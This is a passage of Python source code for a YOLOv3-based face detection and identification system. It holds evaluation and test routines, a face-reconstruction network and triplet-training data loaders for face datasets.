else:
shutil.rmtree(os.path.join(test_path, 'results_fi'))
os.mkdir(os.path.join(test_path, 'results_fi'))
gt_df = pd.read_csv(os.path.join(test_path, 'validation.csv'))
gt_df_g = gt_df.groupby('FILE')
file_names = glob.glob(os.path.join(test_path, '*.jpg'))
with open('ref_facial_id_db.pickle', 'rb') as f:
db_facial_id = pickle.load(f)
# Get registered facial id data.
subject_ids = list(db_facial_id.keys())
facial_ids = []
for subject_id in subject_ids:
facial_ids.append(db_facial_id[subject_id])
reg_facial_ids = np.asarray(facial_ids)
# Detect faces, identify faces and save results.
count1 = 1
with open(output_file_path, 'w') as f:
for file_name in file_names:
if DEBUG: print(count1, '/', len(file_names), file_name)
count1 += 1
# Load an image.
image = imread(os.path.join(test_path, file_name))
image_o = image.copy()
image = image/255
# Adjust the original image size into the normalized image size according to the ratio of width, height.
w = image.shape[1]
h = image.shape[0]
pad_t, pad_b, pad_l, pad_r = 0, 0, 0, 0
if w >= h:
w_p = self.nn_arch['image_size']
h_p = int(h / w * self.nn_arch['image_size'])
pad = self.nn_arch['image_size'] - h_p
if pad % 2 == 0:
pad_t = pad // 2
pad_b = pad // 2
else:
pad_t = pad // 2
pad_b = pad // 2 + 1
image = cv.resize(image, (w_p, h_p), interpolation=cv.INTER_CUBIC)
image = cv.copyMakeBorder(image, pad_t, pad_b, 0, 0, cv.BORDER_CONSTANT, value=[0, 0, 0]) # 416x416?
else:
h_p = self.nn_arch['image_size']
w_p = int(w / h * self.nn_arch['image_size'])
pad = self.nn_arch['image_size'] - w_p
if pad % 2 == 0:
pad_l = pad // 2
pad_r = pad // 2
else:
pad_l = pad // 2
pad_r = pad // 2 + 1
image = cv.resize(image, (w_p, h_p), interpolation=cv.INTER_CUBIC)
image = cv.copyMakeBorder(image, 0, 0, pad_l, pad_r, cv.BORDER_CONSTANT, value=[0, 0, 0]) # 416x416?
image = image[np.newaxis, :]
# Detect faces.
boxes = self.fd.detect(image)
# correct the sizes of the bounding boxes
for box in boxes:
if w >= h:
box.xmin = np.min([box.xmin * w / self.nn_arch['image_size'], w])
box.xmax = np.min([box.xmax * w / self.nn_arch['image_size'], w])
box.ymin = np.min([np.max([box.ymin - pad_t, 0]) * w / self.nn_arch['image_size'], h])
box.ymax = np.min([np.max([box.ymax - pad_t, 0]) * w / self.nn_arch['image_size'], h])
else:
box.xmin = np.min([np.max([box.xmin - pad_l, 0]) * h / self.nn_arch['image_size'], w])
box.xmax = np.min([np.max([box.xmax - pad_l, 0]) * h / self.nn_arch['image_size'], w])
box.ymin = np.min([box.ymin * h / self.nn_arch['image_size'], h])
box.ymax = np.min([box.ymax * h / self.nn_arch['image_size'], h])
count = 1
for box in boxes:
if count > 60:
break
# Search for id from registered facial ids.
# Crop a face region.
l, t, r, b = int(box.xmin), int(box.ymin), int(box.xmax), int(box.ymax)
image = image_o[(t - 1):(b - 1), (l - 1):(r - 1), :]
image = image/255
# Adjust the original image size into the normalized image size according to the ratio of width, height.
w = image.shape[1]
h = image.shape[0]
pad_t, pad_b, pad_l, pad_r = 0, 0, 0, 0
# Check exception.
if w == 0 or h == 0:
continue
if w >= h:
w_p = self.nn_arch['image_size']
h_p = int(h / w * self.nn_arch['image_size'])
pad = self.nn_arch['image_size'] - h_p
if pad % 2 == 0:
pad_t = pad // 2
pad_b = pad // 2
else:
pad_t = pad // 2
pad_b = pad // 2 + 1
image = cv.resize(image, (w_p, h_p), interpolation=cv.INTER_CUBIC)
image = cv.copyMakeBorder(image, pad_t, pad_b, 0, 0, cv.BORDER_CONSTANT, value=[0, 0, 0]) # 416x416?
else:
h_p = self.nn_arch['image_size']
w_p = int(w / h * self.nn_arch['image_size'])
pad = self.nn_arch['image_size'] - w_p
if pad % 2 == 0:
pad_l = pad // 2
pad_r = pad // 2
else:
pad_l = pad // 2
pad_r = pad // 2 + 1
image = cv.resize(image, (w_p, h_p), interpolation=cv.INTER_CUBIC)
image = cv.copyMakeBorder(image, 0, 0, pad_l, pad_r, cv.BORDER_CONSTANT, value=[0, 0, 0]) # 416x416?
# Create anchor facial ids.
anchor_facial_id = self.fid_extractor.predict(image[np.newaxis, ...])
anchor_facial_id = np.squeeze(anchor_facial_id)
# Calculate similarity distances for each registered face ids.
sim_dists = []
for i in range(len(subject_ids)):
sim_dists.append(norm(anchor_facial_id - reg_facial_ids[i]))
sim_dists = np.asarray(sim_dists)
cand = np.argmin(sim_dists)
if sim_dists[cand] > self.hps['sim_th']:
continue
subject_id = subject_ids[cand]
box.subject_id = subject_id
if platform.system() == 'Windows':
f.write(file_name.split('\\')[-1] + ',' + str(subject_id) + ',' + str(box.xmin) + ',' + str(box.ymin) + ',')
print(file_name.split('\\')[-1] + ',' + str(subject_id) + ',' + str(box.xmin) + ',' + str(box.ymin) + ',', end=' ')
else:
f.write(file_name.split('/')[-1] + ',' + str(subject_id) + ',' + str(box.xmin) + ',' + str(box.ymin) + ',')
print(file_name.split('/')[-1] + ',' + str(subject_id) + ',' + str(box.xmin) + ',' + str(box.ymin) + ',', end=' ')
f.write(str(box.xmax - box.xmin) + ',' + str(box.ymax - box.ymin) + ',' + str(box.get_score()) + '\n')
print(str(box.xmax - box.xmin) + ',' + str(box.ymax - box.ymin) + ',' + str(box.get_score()))
count +=1
#boxes = [box for box in boxes if box.subject_id != -1]
# Draw bounding boxes of ground truth.
if platform.system() == 'Windows':
file_new_name = file_name.split('\\')[-1]
else:
file_new_name = file_name.split('/')[-1]
try:
df = gt_df_g.get_group(file_new_name)
except KeyError:
continue
gt_boxes = []
for i in range(df.shape[0]):
# Check exception.
res = df.iloc[i, 3:] > 0 #?
if res.all() == False: #or df.iloc[i, 2] == -1:
continue
xmin = int(df.iloc[i, 3])
xmax = int(xmin + df.iloc[i, 5] - 1)
ymin = int(df.iloc[i, 4])
ymax = int(ymin + df.iloc[i, 6] - 1)
gt_box = BoundBox(xmin, ymin, xmax, ymax, objness=1., classes=[1.0], subject_id=df.iloc[i, 2])
gt_boxes.append(gt_box)
# Check exception.
if len(gt_boxes) == 0 or len(boxes) == 0: #?
continue
image1 = draw_boxes_v3(image_o, gt_boxes, self.hps['face_conf_th'], color=(255, 0, 0))
del image_o
# Draw bounding boxes on the image using labels.
image = draw_boxes_v3(image1, boxes, self.hps['face_conf_th'], color=(0, 255, 0))
del image1
# Write the image with bounding boxes to file.
# Draw bounding boxes of ground truth.
if platform.system() == 'Windows':
file_new_name = file_name.split('\\')[-1]
else:
file_new_name = file_name.split('/')[-1]
file_new_name = file_new_name[:-4] + '_detected' + file_new_name[-4:]
print(file_new_name)
imsave(os.path.join(test_path, 'results_fi', file_new_name), (image).astype('uint8'))
def test(self):
"""Test."""
test_path = self.conf['test_path']
output_file_path = self.conf['output_file_path']
file_names = glob.glob(os.path.join(test_path, '*.jpg'))
with open('ref_facial_id_db.pickle', 'rb') as f:
db_facial_id = pickle.load(f)
# Get registered facial id data.
subject_ids = list(db_facial_id.keys())
facial_ids = []
for subject_id in subject_ids:
facial_ids.append(db_facial_id[subject_id])
reg_facial_ids = np.asarray(facial_ids)
# Detect faces, identify faces and save results.
count1 = 1
with open(output_file_path, 'w') as f:
for file_name in file_names:
if DEBUG: print(count1, '/', len(file_names), file_name)
count1 += 1
# Load an image.
image = imread(os.path.join(test_path, file_name))
image_o = image.copy()
image = image/255
# Adjust the original image size into the normalized image size according to the ratio of width, height.
w = image.shape[1]
h = image.shape[0]
pad_t, pad_b, pad_l, pad_r = 0, 0, 0, 0
if w >= h:
w_p = self.nn_arch['image_size']
h_p = int(h / w * self.nn_arch['image_size'])
pad = self.nn_arch['image_size'] - h_p
if pad % 2 == 0:
pad_t = pad // 2
pad_b = pad // 2
else:
pad_t = pad // 2
pad_b = pad // 2 + 1
image = cv.resize(image, (w_p, h_p), interpolation=cv.INTER_CUBIC)
image = cv.copyMakeBorder(image, pad_t, pad_b, 0, 0, cv.BORDER_CONSTANT, value=[0, 0, 0]) # 416x416?
else:
h_p = self.nn_arch['image_size']
w_p = int(w / h * self.nn_arch['image_size'])
pad = self.nn_arch['image_size'] - w_p
if pad % 2 == 0:
pad_l = pad // 2
pad_r = pad // 2
else:
pad_l = pad // 2
pad_r = pad // 2 + 1
image = cv.resize(image, (w_p, h_p), interpolation=cv.INTER_CUBIC)
image = cv.copyMakeBorder(image, 0, 0, pad_l, pad_r, cv.BORDER_CONSTANT, value=[0, 0, 0]) # 416x416?
image = image[np.newaxis, :]
# Detect faces.
boxes = self.fd.detect(image)
# correct the sizes of the bounding boxes
for box in boxes:
if w >= h:
box.xmin = np.min([box.xmin * w / self.nn_arch['image_size'], w])
box.xmax = np.min([box.xmax * w / self.nn_arch['image_size'], w])
box.ymin = np.min([np.max([box.ymin - pad_t, 0]) * w / self.nn_arch['image_size'], h])
box.ymax = np.min([np.max([box.ymax - pad_t, 0]) * w / self.nn_arch['image_size'], h])
else:
box.xmin = np.min([np.max([box.xmin - pad_l, 0]) * h / self.nn_arch['image_size'], w])
box.xmax = np.min([np.max([box.xmax - pad_l, 0]) * h / self.nn_arch['image_size'], w])
box.ymin = np.min([box.ymin * h / self.nn_arch['image_size'], h])
box.ymax = np.min([box.ymax * h / self.nn_arch['image_size'], h])
count = 1
for box in boxes:
if count > 60:
break
# Search for id from registered facial ids.
# Crop a face region.
l, t, r, b = int(box.xmin), int(box.ymin), int(box.xmax), int(box.ymax)
image = image_o[(t - 1):(b - 1), (l - 1):(r - 1), :]
image = image/255
# Adjust the original image size into the normalized image size according to the ratio of width, height.
w = image.shape[1]
h = image.shape[0]
pad_t, pad_b, pad_l, pad_r = 0, 0, 0, 0
# Check exception.
if w == 0 or h == 0:
continue
if w >= h:
w_p = self.nn_arch['image_size']
h_p = int(h / w * self.nn_arch['image_size'])
pad = self.nn_arch['image_size'] - h_p
if pad % 2 == 0:
pad_t = pad // 2
pad_b = pad // 2
else:
pad_t = pad // 2
pad_b = pad // 2 + 1
image = cv.resize(image, (w_p, h_p), interpolation=cv.INTER_CUBIC)
image = cv.copyMakeBorder(image, pad_t, pad_b, 0, 0, cv.BORDER_CONSTANT, value=[0, 0, 0]) # 416x416?
else:
h_p = self.nn_arch['image_size']
w_p = int(w / h * self.nn_arch['image_size'])
pad = self.nn_arch['image_size'] - w_p
if pad % 2 == 0:
pad_l = pad // 2
pad_r = pad // 2
else:
pad_l = pad // 2
pad_r = pad // 2 + 1
image = cv.resize(image, (w_p, h_p), interpolation=cv.INTER_CUBIC)
image = cv.copyMakeBorder(image, 0, 0, pad_l, pad_r, cv.BORDER_CONSTANT, value=[0, 0, 0]) # 416x416?
# Create anchor facial ids.
anchor_facial_id = self.fid_extractor.predict(image[np.newaxis, ...])
anchor_facial_id = np.squeeze(anchor_facial_id)
anchor_facial_ids = np.asarray([anchor_facial_id for _ in range(len(subject_ids))])
# Calculate similarity distances for each registered face ids.
sim_dists = []
for i in range(len(subject_ids)):
sim_dists.append(norm(anchor_facial_ids[i] - reg_facial_ids[i]))
sim_dists = np.asarray(sim_dists)
cand = np.argmin(sim_dists)
if sim_dists[cand] > self.hps['sim_th']:
continue
subject_id = subject_ids[cand]
if platform.system() == 'Windows':
f.write(file_name.split('\\')[-1] + ',' + str(subject_id) + ',' + str(box.xmin) + ',' + str(box.ymin) + ',')
else:
f.write(file_name.split('/')[-1] + ',' + str(subject_id) + ',' + str(box.xmin) + ',' + str(box.ymin) + ',')
f.write(str(box.xmax - box.xmin) + ',' + str(box.ymax - box.ymin) + ',' + str(box.get_score()) + '\n')
count +=1
# Check exception.
if len(boxes) == 0:
continue
def create_face_reconst_model(self):
"""Create the face reconstruction model."""
if hasattr(self, 'model') != True or isinstance(self.model, Model) != True:
raise ValueError('A valid model instance doesn\'t exist.')
if self.conf['face_vijana_recon_load']:
self.recon_model = load_model('face_vijnana_recon.h5')
return
# Get all layers and extract input layers and output layers.
layers = self.model.layers
input_layers = [layer for layer in layers if isinstance(layer, InputLayer) == True]
output_layer_names = [t.name.split('/')[0] for t in self.model.outputs]
output_layers = [layer for layer in layers if layer.name in output_layer_names]
# Input.
input1 = Input(shape=(int(output_layers[0].output_shape[1]/3), ), name='input1')
x = Lambda(lambda x: K.l2_normalize(x, axis=-1), name='l2_norm_layer')(input1) #?
x = ReLU()(x)
dense_layer = Dense(self.model.get_layer('dense1').input_shape[1]
, activation='linear'
, name='dense1')
x = dense_layer(x)
dense_layer.set_weights((self.model.get_layer('dense1').get_weights()[0].T
, np.random.rand(self.model.get_layer('dense1').get_weights()[0].shape[0])))
# Yolov3.
yolov3 = self.model.get_layer('base')
x = Reshape(yolov3.output_shape[1:])(x)
skip = x #?
# 73 ~ 63.
for i in range(73, 63, -3):
conv_layer = yolov3.get_layer('conv_' + str(i))
deconv_layer = Conv2DTranspose(filters=conv_layer.input_shape[-1]
, kernel_size=conv_layer.kernel_size
, padding='same' #?
, use_bias=False
, name=conv_layer.name) #?
norm_layer = yolov3.get_layer('bnorm_' + str(i))
inv_norm_layer = BatchNormalization.from_config(norm_layer.get_config())
x = LeakyReLU(alpha=0.1)(x)
x = Lambda(lambda x: K.l2_normalize(x, axis=-1))(x)
x = inv_norm_layer(x)
x = deconv_layer(x)
deconv_layer.set_weights(conv_layer.get_weights())
conv_layer = yolov3.get_layer('conv_' + str(i - 1))
deconv_layer = Conv2DTranspose(filters=conv_layer.input_shape[-1]
, kernel_size=conv_layer.kernel_size
, padding='same' #?
, use_bias=False
, name=conv_layer.name) #?
norm_layer = yolov3.get_layer('bnorm_' + str(i - 1))
inv_norm_layer = BatchNormalization.from_config(norm_layer.get_config())
x = LeakyReLU(alpha=0.1)(x)
x = Lambda(lambda x: K.l2_normalize(x, axis=-1))(x)
x = inv_norm_layer(x)
x = deconv_layer(x)
deconv_layer.set_weights(conv_layer.get_weights())
x = subtract([x, skip]) #?
skip = x #?
# 62.
conv_layer = yolov3.get_layer('conv_' + str(62))
deconv_layer = Conv2DTranspose(filters=conv_layer.input_shape[-1]
, kernel_size=conv_layer.kernel_size
, strides=conv_layer.strides
, padding='same'
, use_bias=False
, name=conv_layer.name) #?
norm_layer = yolov3.get_layer('bnorm_' + str(62))
inv_norm_layer = BatchNormalization.from_config(norm_layer.get_config())
x = LeakyReLU(alpha=0.1)(x)
x = Lambda(lambda x: K.l2_normalize(x, axis=-1))(x)
x = inv_norm_layer(x)
x = deconv_layer(x)
deconv_layer.set_weights(conv_layer.get_weights())
skip = x
# 60 ~ 38.
for i in range(60, 38, -3):
conv_layer = yolov3.get_layer('conv_' + str(i))
deconv_layer = Conv2DTranspose(filters=conv_layer.input_shape[-1]
, kernel_size=conv_layer.kernel_size
, padding='same' #?
, use_bias=False
, name=conv_layer.name) #?
norm_layer = yolov3.get_layer('bnorm_' + str(i))
inv_norm_layer = BatchNormalization.from_config(norm_layer.get_config())
x = LeakyReLU(alpha=0.1)(x)
x = Lambda(lambda x: K.l2_normalize(x, axis=-1))(x)
x = inv_norm_layer(x)
x = deconv_layer(x)
deconv_layer.set_weights(conv_layer.get_weights())
conv_layer = yolov3.get_layer('conv_' + str(i - 1))
deconv_layer = Conv2DTranspose(filters=conv_layer.input_shape[-1]
, kernel_size=conv_layer.kernel_size
, padding='same' #?
, use_bias=False
, name=conv_layer.name) #?
norm_layer = yolov3.get_layer('bnorm_' + str(i - 1))
inv_norm_layer = BatchNormalization.from_config(norm_layer.get_config())
x = LeakyReLU(alpha=0.1)(x)
x = Lambda(lambda x: K.l2_normalize(x, axis=-1))(x)
x = inv_norm_layer(x)
x = deconv_layer(x)
deconv_layer.set_weights(conv_layer.get_weights())
x = subtract([x, skip]) #?
skip = x #??
# 37.
conv_layer = yolov3.get_layer('conv_' + str(37))
deconv_layer = Conv2DTranspose(filters=conv_layer.input_shape[-1]
, kernel_size=conv_layer.kernel_size
, strides=conv_layer.strides
, padding='same'
, use_bias=False
, name=conv_layer.name) #?
norm_layer = yolov3.get_layer('bnorm_' + str(37))
inv_norm_layer = BatchNormalization.from_config(norm_layer.get_config())
x = LeakyReLU(alpha=0.1)(x)
x = Lambda(lambda x: K.l2_normalize(x, axis=-1))(x)
x = inv_norm_layer(x)
x = deconv_layer(x)
deconv_layer.set_weights(conv_layer.get_weights())
skip = x
# 35 ~ 13.
for i in range(35, 13, -3):
conv_layer = yolov3.get_layer('conv_' + str(i))
deconv_layer = Conv2DTranspose(filters=conv_layer.input_shape[-1]
, kernel_size=conv_layer.kernel_size
, padding='same' #?
, use_bias=False
, name=conv_layer.name) #?
norm_layer = yolov3.get_layer('bnorm_' + str(i))
inv_norm_layer = BatchNormalization.from_config(norm_layer.get_config())
x = LeakyReLU(alpha=0.1)(x)
x = Lambda(lambda x: K.l2_normalize(x, axis=-1))(x)
x = inv_norm_layer(x)
x = deconv_layer(x)
deconv_layer.set_weights(conv_layer.get_weights())
conv_layer = yolov3.get_layer('conv_' + str(i - 1))
deconv_layer = Conv2DTranspose(filters=conv_layer.input_shape[-1]
, kernel_size=conv_layer.kernel_size
, padding='same' #?
, use_bias=False
, name=conv_layer.name) #?
norm_layer = yolov3.get_layer('bnorm_' + str(i - 1))
inv_norm_layer = BatchNormalization.from_config(norm_layer.get_config())
x = LeakyReLU(alpha=0.1)(x)
x = Lambda(lambda x: K.l2_normalize(x, axis=-1))(x)
x = inv_norm_layer(x)
x = deconv_layer(x)
deconv_layer.set_weights(conv_layer.get_weights())
x = subtract([x, skip]) #?
skip = x #?
# 12.
conv_layer = yolov3.get_layer('conv_' + str(12))
deconv_layer = Conv2DTranspose(filters=conv_layer.input_shape[-1]
, kernel_size=conv_layer.kernel_size
, strides=conv_layer.strides
, padding='same'
, use_bias=False
, name=conv_layer.name) #?
norm_layer = yolov3.get_layer('bnorm_' + str(12))
inv_norm_layer = BatchNormalization.from_config(norm_layer.get_config())
x = LeakyReLU(alpha=0.1)(x)
x = Lambda(lambda x: K.l2_normalize(x, axis=-1))(x)
x = inv_norm_layer(x)
x = deconv_layer(x)
deconv_layer.set_weights(conv_layer.get_weights())
skip = x
# 10 ~ 6.
for i in range(10, 6, -3):
conv_layer = yolov3.get_layer('conv_' + str(i))
deconv_layer = Conv2DTranspose(filters=conv_layer.input_shape[-1]
, kernel_size=conv_layer.kernel_size
, padding='same' #?
, use_bias=False
, name=conv_layer.name) #?
norm_layer = yolov3.get_layer('bnorm_' + str(i))
inv_norm_layer = BatchNormalization.from_config(norm_layer.get_config())
x = LeakyReLU(alpha=0.1)(x)
x = Lambda(lambda x: K.l2_normalize(x, axis=-1))(x)
x = inv_norm_layer(x)
x = deconv_layer(x)
deconv_layer.set_weights(conv_layer.get_weights())
conv_layer = yolov3.get_layer('conv_' + str(i - 1))
deconv_layer = Conv2DTranspose(filters=conv_layer.input_shape[-1]
, kernel_size=conv_layer.kernel_size
, padding='same' #?
, use_bias=False
, name=conv_layer.name) #?
norm_layer = yolov3.get_layer('bnorm_' + str(i - 1))
inv_norm_layer = BatchNormalization.from_config(norm_layer.get_config())
x = LeakyReLU(alpha=0.1)(x)
x = Lambda(lambda x: K.l2_normalize(x, axis=-1))(x)
x = inv_norm_layer(x)
x = deconv_layer(x)
deconv_layer.set_weights(conv_layer.get_weights())
x = subtract([x, skip]) #?
skip = x #?
# 5.
conv_layer = yolov3.get_layer('conv_' + str(5))
deconv_layer = Conv2DTranspose(filters=conv_layer.input_shape[-1]
, kernel_size=conv_layer.kernel_size
, strides=conv_layer.strides
, padding='same'
, use_bias=False
, name=conv_layer.name) #?
norm_layer = yolov3.get_layer('bnorm_' + str(5))
inv_norm_layer = BatchNormalization.from_config(norm_layer.get_config())
x = LeakyReLU(alpha=0.1)(x)
x = Lambda(lambda x: K.l2_normalize(x, axis=-1))(x)
x = inv_norm_layer(x)
x = deconv_layer(x)
deconv_layer.set_weights(conv_layer.get_weights())
skip = x
# 4 ~ 2.
for i in range(3, 1, -2):
conv_layer = yolov3.get_layer('conv_' + str(i))
deconv_layer = Conv2DTranspose(filters=conv_layer.input_shape[-1]
, kernel_size=conv_layer.kernel_size
, padding='same' #?
, use_bias=False
, name=conv_layer.name) #?
norm_layer = yolov3.get_layer('bnorm_' + str(i))
inv_norm_layer = BatchNormalization.from_config(norm_layer.get_config())
x = LeakyReLU(alpha=0.1)(x)
x = Lambda(lambda x: K.l2_normalize(x, axis=-1))(x)
x = inv_norm_layer(x)
x = deconv_layer(x)
deconv_layer.set_weights(conv_layer.get_weights())
conv_layer = yolov3.get_layer('conv_' + str(i - 1))
deconv_layer = Conv2DTranspose(filters=conv_layer.input_shape[-1]
, kernel_size=conv_layer.kernel_size
, padding='same' #?
, use_bias=False
, name=conv_layer.name) #?
norm_layer = yolov3.get_layer('bnorm_' + str(i - 1))
inv_norm_layer = BatchNormalization.from_config(norm_layer.get_config())
x = LeakyReLU(alpha=0.1)(x)
x = Lambda(lambda x: K.l2_normalize(x, axis=-1))(x)
x = inv_norm_layer(x)
x = deconv_layer(x)
deconv_layer.set_weights(conv_layer.get_weights())
x = subtract([x, skip]) #?
skip = x #?
# 1 ~ 0.
conv_layer = yolov3.get_layer('conv_' + str(1))
deconv_layer = Conv2DTranspose(filters=conv_layer.input_shape[-1]
, kernel_size=conv_layer.kernel_size
, strides=conv_layer.strides
, padding='same'
, use_bias=False
, name=conv_layer.name) #?
norm_layer = yolov3.get_layer('bnorm_' + str(1))
inv_norm_layer = BatchNormalization.from_config(norm_layer.get_config())
x = LeakyReLU(alpha=0.1)(x)
x = Lambda(lambda x: K.l2_normalize(x, axis=-1))(x)
x = inv_norm_layer(x)
x = deconv_layer(x)
deconv_layer.set_weights(conv_layer.get_weights())
conv_layer = yolov3.get_layer('conv_' + str(0))
deconv_layer = Conv2DTranspose(filters=conv_layer.input_shape[-1]
, kernel_size=conv_layer.kernel_size
, padding='same'
, use_bias=False
, name='output') #?
norm_layer = yolov3.get_layer('bnorm_' + str(0))
inv_norm_layer = BatchNormalization.from_config(norm_layer.get_config())
x = LeakyReLU(alpha=0.1)(x)
x = Lambda(lambda x: K.l2_normalize(x, axis=-1))(x)
x = inv_norm_layer(x)
output = deconv_layer(x)
deconv_layer.set_weights(conv_layer.get_weights())
self.recon_model = Model(inputs=[input1], outputs=[output])
self.recon_model.trainable = True
self.recon_model.save('face_vijnana_recon.h5')
class TrainingSequence(Sequence):
"""Training data set sequence."""
def __init__(self, raw_data_path, hps, nn_arch, load_flag=True):
if load_flag:
with open('img_triplet_pairs.pickle', 'rb') as f:
self.img_triplet_pairs = pickle.load(f)
self.img_triplet_pairs = self.img_triplet_pairs
# Create indexing data of positive and negative cases.
self.raw_data_path = raw_data_path
self.hps = hps
self.nn_arch = nn_arch
self.db = pd.read_csv('subject_image_db.csv')
self.db = self.db.iloc[:, 1:]
self.batch_size = self.hps['batch_size']
self.hps['step'] = len(self.img_triplet_pairs) // self.batch_size
if len(self.img_triplet_pairs) % self.batch_size != 0:
self.hps['step'] +=1
else:
# Create indexing data of positive and negative cases.
self.raw_data_path = raw_data_path
self.hps = hps
self.db = pd.read_csv('subject_image_db.csv')
self.db = self.db.iloc[:, 1:]
self.t_indexes = np.asarray(self.db.index)
self.db_g = self.db.groupby('subject_id')
self.img_triplet_pairs = []
valid_indexes = self.t_indexes
for i in self.db_g.groups.keys():
df = self.db_g.get_group(i)
ex_indexes2 = np.asarray(df.index)
ex_inv_idxes = []
for v in valid_indexes:
if (ex_indexes2 == v).any():
ex_inv_idxes.append(False)
else:
ex_inv_idxes.append(True)
ex_inv_idxes = np.asarray(ex_inv_idxes)
valid_indexes2 = valid_indexes[ex_inv_idxes]
# Triplet sample pair.
for k in range(0, ex_indexes2.shape[0] - 1):
for l in range(k + 1, ex_indexes2.shape[0]):
self.img_triplet_pairs.append((ex_indexes2[k]
, ex_indexes2[l]
, np.random.choice(valid_indexes2, size=1)[0]))
self.batch_size = self.hps['batch_size']
self.hps['step'] = len(self.img_triplet_pairs) // self.batch_size
if len(self.img_triplet_pairs) % self.batch_size != 0:
self.hps['step'] +=1
# Shuffle image pairs.
shuffle(self.img_triplet_pairs)
with open('img_triplet_pairs.pickle', 'wb') as f:
pickle.dump(self.img_triplet_pairs, f)
def __len__(self):
return self.hps['step']
def __getitem__(self, index):
images_a = []
images_p = []
images_n = []
# Check the last index.
if index == (self.hps['step'] - 1):
for bi in range(index * self.batch_size, len(self.img_triplet_pairs)):
# Get the anchor and comparison images.
image_a = imread(os.path.join(self.raw_data_path
, 'subject_faces'
, self.db.loc[self.img_triplet_pairs[bi][0], 'face_file']))
image_p = imread(os.path.join(self.raw_data_path
, 'subject_faces'
, self.db.loc[self.img_triplet_pairs[bi][1], 'face_file']))
image_n = imread(os.path.join(self.raw_data_path
, 'subject_faces'
, self.db.loc[self.img_triplet_pairs[bi][2], 'face_file']))
images_a.append(image_a/255)
images_p.append(image_p/255)
images_n.append(image_n/255)
else:
for bi in range(index * self.batch_size, (index + 1) * self.batch_size):
# Get the anchor and comparison images.
image_a = imread(os.path.join(self.raw_data_path
, 'subject_faces'
, self.db.loc[self.img_triplet_pairs[bi][0], 'face_file']))
image_p = imread(os.path.join(self.raw_data_path
, 'subject_faces'
, self.db.loc[self.img_triplet_pairs[bi][1], 'face_file']))
image_n = imread(os.path.join(self.raw_data_path
, 'subject_faces'
, self.db.loc[self.img_triplet_pairs[bi][2], 'face_file']))
images_a.append(image_a/255)
images_p.append(image_p/255)
images_n.append(image_n/255)
return ({'input_a': np.asarray(images_a)
, 'input_p': np.asarray(images_p)
, 'input_n': np.asarray(images_n)}
, {'output': np.zeros(shape=(len(images_a), 192))})
class TrainingSequenceVGGFace2(Sequence):
"""Training data set sequence."""
def __init__(self, raw_data_path, hps, nn_arch, load_flag=True):
if load_flag:
with open('img_triplet_pairs_vggface2.pickle', 'rb') as f:
self.img_triplet_pairs = pickle.load(f)
self.img_triplet_pairs = self.img_triplet_pairs
# Create indexing data of positive and negative cases.
self.raw_data_path = raw_data_path
self.hps = hps
self.nn_arch = nn_arch
self.db = pd.read_csv('subject_image_vggface2_db.csv')
self.db = self.db.iloc[:, 1:]
self.batch_size = self.hps['batch_size']
self.hps['step'] = len(self.img_triplet_pairs) // self.batch_size
if len(self.img_triplet_pairs) % self.batch_size != 0:
self.hps['step'] +=1
else:
# Create indexing data of positive and negative cases.
self.raw_data_path = raw_data_path
self.hps = hps
self.db = pd.read_csv('subject_image_vggface2_db.csv')
self.db = self.db.iloc[:, 1:]
self.t_indexes = np.asarray(self.db.index)
self.db_g = self.db.groupby('subject_id')
self.img_triplet_pairs = []
valid_indexes = self.t_indexes
for i in self.db_g.groups.keys():
df = self.db_g.get_group(i)
ex_indexes2 = np.asarray(df.index)
ex_inv_idxes = []
for v in valid_indexes:
if (ex_indexes2 == v).any():
ex_inv_idxes.append(False)
else:
ex_inv_idxes.append(True)
ex_inv_idxes = np.asarray(ex_inv_idxes)
valid_indexes2 = valid_indexes[ex_inv_idxes]
# Triplet sample pair.
for k in range(0, ex_indexes2.shape[0] - 1):
for l in range(k + 1, ex_indexes2.shape[0]):
self.img_triplet_pairs.append((ex_indexes2[k]
, ex_indexes2[l]
, np.random.choice(valid_indexes2, size=1)[0]))
self.batch_size = self.hps['batch_size']
self.hps['step'] = len(self.img_triplet_pairs) // self.batch_size
if len(self.img_triplet_pairs) % self.batch_size != 0:
self.hps['step'] +=1
# Shuffle image pairs.
shuffle(self.img_triplet_pairs)
with open('img_triplet_pairs_vggface2.pickle', 'wb') as f:
pickle.dump(self.img_triplet_pairs, f)
def __len__(self):
return self.hps['step']
def __getitem__(self, index):
images_a = []
images_p = []
images_n = []
# Check the last index.
if index == (self.hps['step'] - 1):
for bi in range(index * self.batch_size, len(self.img_triplet_pairs)):
# Get the anchor and comparison images.
image_a = imread(os.path.join(self.raw_data_path
, 'subject_faces_vggface2'
, self.db.loc[self.img_triplet_pairs[bi][0], 'face_file']))
image_p = imread(os.path.join(self.raw_data_path
, 'subject_faces_vggface2'
, self.db.loc[self.img_triplet_pairs[bi][1], 'face_file']))
image_n = imread(os.path.join(self.raw_data_path
, 'subject_faces_vggface2'
, self.db.loc[self.img_triplet_pairs[bi][2], 'face_file']))
images_a.append(image_a/255)
images_p.append(image_p/255)
images_n.append(image_n/255)
else:
for bi in range(index * self.batch_size, (index + 1) * self.batch_size):
# Get the anchor and comparison images.
image_a = imread(os.path.join(self.raw_data_path
, 'subject_faces_vggface2'
, self.db.loc[self.img_triplet_pairs[bi][0], 'face_file']))
image_p = imread(os.path.join(self.raw_data_path
, 'subject_faces_vggface2'
, self.db.loc[self.img_triplet_pairs[bi][1], 'face_file']))
image_n = imread(os.path.join(self.raw_data_path
, 'subject_faces_vggface2'
, self.db.loc[self.img_triplet_pairs[bi][2], 'face_file']))
images_a.append(image_a/255)
images_p.append(image_p/255)
images_n.append(image_n/255)
return ({'input_a': np.asarray(images_a)
, 'input_p': np.asarray(images_p)
, 'input_n': np.asarray(images_n)}
, {'output': np.zeros(shape=(len(images_a), 192))})
def main():
"""Main."""
# Load configuration.
if platform.system() == 'Windows':
with open("face_vijnana_yolov3_win.json", 'r') as f:
conf = json.load(f)
else:
with open("face_vijnana_yolov3.json", 'r') as f:
conf = json.load(f)
if conf['fi_conf']['mode'] == 'data':
# Create db.
ts = time.time()
create_db_fi(conf)
te = time.time()
print('Elasped time: {0:f}s'.format(te-ts))
elif conf['fi_conf']['mode'] == 'train':
# Train.
fi = FaceIdentifier(conf)
ts = time.time()
fi.train()
fi.make_facial_ids_db()
fi.register_facial_ids()
te = time.time()
print('Elasped time: {0:f}s'.format(te-ts))
elif conf['fi_conf']['mode'] == 'evaluate':
# Test.
fi = FaceIdentifier(conf)
ts = time.time()
#fi.register_facial_ids()
fi.evaluate()
te = time.time()
print('Elasped time: {0:f}s'.format(te-ts))
elif conf['fi_conf']['mode'] == 'test':
